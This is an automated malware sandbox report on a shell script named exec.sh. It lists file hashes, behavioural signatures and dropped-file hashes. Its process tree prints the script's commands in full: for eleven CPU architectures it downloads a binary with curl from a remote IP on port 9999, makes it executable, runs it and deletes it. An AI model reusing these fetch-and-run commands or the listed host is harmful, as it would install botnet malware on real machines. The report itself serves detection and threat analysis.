Analysis
-
max time kernel
376s -
max time network
379s -
platform
debian-9_armhf -
resource
debian9-armhf-20240226-en -
resource tags
arch:armhfimage:debian9-armhf-20240226-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
15-03-2024 20:08
Static task
static1
Behavioral task
behavioral1
Sample
exec.sh
Resource
ubuntu1804-amd64-20240226-en
Behavioral task
behavioral2
Sample
exec.sh
Resource
debian9-armhf-20240226-en
Behavioral task
behavioral3
Sample
exec.sh
Resource
debian9-mipsbe-20240226-en
Behavioral task
behavioral4
Sample
exec.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
exec.sh
-
Size
842B
-
MD5
4eeac4436b9c68f85b1c3a2bae62d3f3
-
SHA1
4895bfd63ba3ae5fd97f69c4a243d4bae7eddfa1
-
SHA256
bfa195bd238473bfead86e74b796c4721d1f5281c284b96ff29d8806a82a6520
-
SHA512
e0091672dd843f9dd87b50f43c8b09711cd1b02c40a5a8e51a53878cdd213881328583e99d1d92aef5c497abdd3f181fe6f3a740aedb7d66918c05788bbd0e5b
Malware Config
Signatures
-
Executes dropped EXE 11 IoCs
Processes:
386_binaryamd64_binaryarm_binaryarm64_binarymips_binarymips64_binarymips64le_binarymipsle_binaryppc64_binaryppc64le_binarys390x_binaryioc pid process /tmp/386_binary 739 386_binary /tmp/amd64_binary 781 amd64_binary /tmp/arm_binary 790 arm_binary /tmp/arm64_binary 808 arm64_binary /tmp/mips_binary 815 mips_binary /tmp/mips64_binary 826 mips64_binary /tmp/mips64le_binary 838 mips64le_binary /tmp/mipsle_binary 849 mipsle_binary /tmp/ppc64_binary 858 ppc64_binary /tmp/ppc64le_binary 883 ppc64le_binary /tmp/s390x_binary 896 s390x_binary -
Checks CPU configuration 1 TTPs 11 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Enumerates kernel/hardware configuration 1 TTPs 1 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
arm_binarydescription ioc process File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size arm_binary -
Reads runtime system information 22 IoCs
Reads data from /proc virtual filesystem.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/mipsle_binary curl File opened for modification /tmp/ppc64_binary curl File opened for modification /tmp/ppc64le_binary curl File opened for modification /tmp/386_binary curl File opened for modification /tmp/amd64_binary curl File opened for modification /tmp/arm64_binary curl File opened for modification /tmp/mips64_binary curl File opened for modification /tmp/mips64le_binary curl File opened for modification /tmp/arm_binary curl File opened for modification /tmp/mips_binary curl File opened for modification /tmp/s390x_binary curl
Processes
-
/tmp/exec.sh/tmp/exec.sh1⤵
-
/usr/bin/curlcurl -o 386_binary http://5.10.249.153:9999/3862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x 386_binary2⤵
-
/tmp/386_binary./386_binary2⤵
- Executes dropped EXE
-
/bin/rmrm -rf 386_binary2⤵
-
/usr/bin/curlcurl -o amd64_binary http://5.10.249.153:9999/amd642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x amd64_binary2⤵
-
/tmp/amd64_binary./amd64_binary2⤵
- Executes dropped EXE
-
/bin/rmrm -rf amd64_binary2⤵
-
/usr/bin/curlcurl -o arm_binary http://5.10.249.153:9999/arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x arm_binary2⤵
-
/tmp/arm_binary./arm_binary2⤵
- Executes dropped EXE
- Enumerates kernel/hardware configuration
-
/bin/rmrm -rf arm_binary2⤵
-
/usr/bin/curlcurl -o arm64_binary http://5.10.249.153:9999/arm642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x arm64_binary2⤵
-
/tmp/arm64_binary./arm64_binary2⤵
- Executes dropped EXE
-
/bin/rmrm -rf arm64_binary2⤵
-
/usr/bin/curlcurl -o mips_binary http://5.10.249.153:9999/mips2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x mips_binary2⤵
-
/tmp/mips_binary./mips_binary2⤵
- Executes dropped EXE
-
/bin/rmrm -rf mips_binary2⤵
-
/usr/bin/curlcurl -o mips64_binary http://5.10.249.153:9999/mips642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x mips64_binary2⤵
-
/tmp/mips64_binary./mips64_binary2⤵
- Executes dropped EXE
-
/bin/rmrm -rf mips64_binary2⤵
-
/usr/bin/curlcurl -o mips64le_binary http://5.10.249.153:9999/mips64le2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x mips64le_binary2⤵
-
/tmp/mips64le_binary./mips64le_binary2⤵
- Executes dropped EXE
-
/bin/rmrm -rf mips64le_binary2⤵
-
/usr/bin/curlcurl -o mipsle_binary http://5.10.249.153:9999/mipsle2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x mipsle_binary2⤵
-
/tmp/mipsle_binary./mipsle_binary2⤵
- Executes dropped EXE
-
/bin/rmrm -rf mipsle_binary2⤵
-
/usr/bin/curlcurl -o ppc64_binary http://5.10.249.153:9999/ppc642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x ppc64_binary2⤵
-
/tmp/ppc64_binary./ppc64_binary2⤵
- Executes dropped EXE
-
/bin/rmrm -rf ppc64_binary2⤵
-
/usr/bin/curlcurl -o ppc64le_binary http://5.10.249.153:9999/ppc64le2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x ppc64le_binary2⤵
-
/tmp/ppc64le_binary./ppc64le_binary2⤵
- Executes dropped EXE
-
/bin/rmrm -rf ppc64le_binary2⤵
-
/usr/bin/curlcurl -o s390x_binary http://5.10.249.153:9999/s390x2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x s390x_binary2⤵
-
/tmp/s390x_binary./s390x_binary2⤵
- Executes dropped EXE
-
/bin/rmrm -rf s390x_binary2⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
/tmp/386_binaryFilesize
96KB
MD578467b8cc11bc06bfa0088903ef2aea6
SHA13d449e46ac744a93b81fa17ae68d520bb1a485b8
SHA256b10f0076d73de353b5b9662c128d8076ea5312f6b39f0f5626b52401cedcdaea
SHA512e26221e52c96dc5a22b6f41c0d334d63d9e5b501a724d699574acdec70b84b64f2cf0ef679d4eb044e82cdb116b33368aa58a5672e2fa06ba3ba47429390a63e
-
/tmp/amd64_binaryFilesize
340KB
MD57ab69bc65941bd4b7be22edeceff3c95
SHA12ea68c4882bf66eed0ce371edd2fdac87c35d536
SHA256db9d86506b2499e1a81a675aae5afb07d205949878b04b545d112e4f3312146d
SHA512531b4f5bf556abde75ed101ec4256446877b461333cd45f7b9b32ea36ff2bcb9385e2e4e5c784b85d6d792dd4404cb8417cbd5c174534f54faed62daaf2f2ff6
-
/tmp/arm64_binaryFilesize
68KB
MD551eb00b6742c2bed9038ebbd0fa47969
SHA19b15e81cbb90a8891e1cdc20f769e2999f3c6cac
SHA2568b7fbb7e4b08dd1f81a3bb457ceb52ea6c7c0abdaa8ed21aa8c2bdd9a1fa3cef
SHA51241625da539bc9440abf0f722dfe0d85631d9d2d91a800fbdeba23539f382da564818cec5a3a13888023b3faf9082e1c453dd58eba5aa71705065d2090af6615c
-
/tmp/arm_binaryFilesize
904KB
MD541e96f8250e85287106c70c06ec17626
SHA116bbd0286f9706366e543f947a39e75a559f7d33
SHA25667c3cd1fead9e2e3dbdddbd793138cb1717aa79e855705d9fb21ff17d56d0da0
SHA512bd588027be7e8c3afb2626b1577f2fcb729cca891cda0d1dd0c1d17397be85d47c301255f016c78119b499f229ca2dd282f2b62de3ec7b22eaa85760d972cb65
-
/tmp/mips64_binaryFilesize
344KB
MD5627355f16422619eb458b20532d5dfad
SHA14aa86dde2f5b4fa89b6f49a2fd60e55d2ad0fc65
SHA256e6a809ef28406efd870b9db91db7ab90a39491bb5345c45da7539b18b88d1a97
SHA51277c90e16a7b1c7ad8fc993e1db90dbdf4b0991efd6f19dafa56035e6a4ff8573e17705655c7963b53f44d801e2dc036b3a938584de71cd6668d7ee13121604f2
-
/tmp/mips64le_binaryFilesize
56KB
MD5c368512a64acce5ae0c55ae19f339a52
SHA1e8c68a423fbb192eca08a1df3f5378efbe80ba85
SHA2565c8d700d80c9ea5d97a7dffa76f830dffb0507f9d0922773a08b67488c86f097
SHA5122b108f1bfc9aa279286722669aaf830c766270b1765d4af321ee81ad5b677824a8b6366bc0579f2a06d5d8b2bce524156745625516c4c3472040760025f31a33
-
/tmp/mips_binaryFilesize
76KB
MD506f0d8fcc944e65810023bf2c30bc47c
SHA19def96584e9eca575d11b07aeb4c75c0a8277d2e
SHA256239e28fdf5d1b805b7b793ba0e2f65a3bb01d248f21b31e33463d4212c8acef7
SHA5121a1d4a5db9fd629f442eaa5f68acdb6e5c0e8356c3929bb5ad377aaba5487f784dd5e9f03317bdbdb6ffb6d00397cec4e6b33e40eaa87e2c31f17419f839aee5
-
/tmp/mipsle_binaryFilesize
160KB
MD5c20acb0ceb78ce87bd3ceb789c00557f
SHA1cff51664a84d2c12e20aacd88b49115e84100904
SHA25614592328c7f4dfae388079f381833e3963bffc216f55bf45bf29e2c82cda2fc1
SHA512fa3d4fb3e7d920ef00e98bc1fedb09b81977512f4790f9ea214b371dea3bf7e7aea3c2baeb7b14c4d655439b8c80a11d7189e62887c97021f36f2ec5037a6ec3
-
/tmp/ppc64_binaryFilesize
176KB
MD5b4ecfc6c2fc8fc18088d9f591463a980
SHA1ce7a095fdb9a919a6f8c1a2a27d12550d89ac729
SHA256f74171322b7efd43615f6e887b81eda45c5bf478072bcc766958878476519cc3
SHA512b898f8e87d508d4bc884977ea379fed1edee612971b5d91b92b1342787bb999c3adb563cb2cd7fe1265a7f96749b94b0d369f13af88155899bbce0ebb8da5954
-
/tmp/ppc64le_binaryFilesize
460KB
MD59c9c4b4ea36b8e0b402bed656bda2b3c
SHA1b2fe7beecff50ffce99ba44875bdf43b3e9537e6
SHA2564a39a5d11722e3f4c8ef13e9f25fead84abb2edcb65fdd624b70f2f6720f7792
SHA512113e2901d9c261d591f8b9bee293c82fc5128fb3818e5bd563c47b61d11740eee14150bacf282f98b9c3f1d3cf743a574b3404ed5fdeff71b9bf2abc1428add9
-
/tmp/s390x_binaryFilesize
1.0MB
MD589d20875501b6cffcb21eac9dfa93fbc
SHA1c83aa9f2eab8682e7955f58df4f4c6639559e03d
SHA2563ddd07b0b7f34c21b8e193b33b7323dea3a6b020b9c07fe629d9371709d62ed7
SHA512c296e5b2548d87da836666e124b4cc7cf39268fd9fb2c8e8eca94416f23158c9dcf2e16227530673a5ee70d859ab08b8bfd3ad9352b4d775deea511d3f4f85e2